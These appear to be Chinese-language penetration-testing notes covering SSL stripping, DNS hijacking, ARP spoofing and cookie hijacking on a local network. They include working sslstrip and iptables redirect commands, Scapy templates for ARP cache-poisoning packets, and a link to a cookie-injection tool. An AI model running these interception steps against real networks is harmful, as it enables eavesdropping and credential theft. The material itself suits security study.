SSL
检查外网网站是否安装SSL协议以及SSV版本 wosign.ssllabs.com SSL密码嗅探 sslstrip "# echo 1 > /proc/sys/net/ipv4/ip_forward # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 # sslstrip -l 10000"
DNS劫持
目的 钓鱼/广告植入/DOS 防御 准备备用域名/手动修改DNS/手动修改路由器密码
ARP欺骗
原理 IP->被攻击者IP mac->攻击者mac / 使局域网中指定的/全部 目标机器数据包-通过攻击者主机转发 类型-多数情况下都是同时使用 主机型 网关型 目的 数据监听/敏感信息获取/重放攻击/篡改/钓鱼/结合DNS欺骗进一步渗透 Kali/攻击 ip:192.168.1.102/ MAC:00:0c:29:6e:98:a6 Windows/目标 IP:192.168.1.18 Getway IP:192.168.1.1 "pkt = Ether(src=[1.102的MAC], dst=[1.18的Mac]) / ARP(1.102的MAC, 网关IP地址, hwdst=1.18MAC, pdst=1.18IP地址, op=2) 或者 pkt = Ether(src=[1.102的MAC], dst=[1. 18的Mac]) / ARP(1.102的MAC, 网关IP地址, hwdst=1. 18MAC, pdst=1. 18IP地址, op=1)" 1. 18发往网关的数据包都会被发往1.102。 "pkt = Ether(src=[1.102的MAC], dst=[网关的Mac]) / ARP(1.102的MAC, 1. 18地址, hwdst=网关MAC,pdst=网关IP地址, op=2) 或者pkt = Ether(src=[1.102的MAC], dst=[网关的Mac]) / ARP(1.102的MAC, 1. 18地址, hwdst=网关MAC, pdst=网关IP地址, op=1)" 网关发往1.18的数据包都发送到Kali Linux(1.102)上 pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2) 广播欺骗 drifnet 欺骗成功后利用工具/FILTER和REPLACE数据构造
Cookie劫持
Cookie-Injecting-Tools 谷歌扩展工具/https://github.com/lfzark/cookie-injecting-tools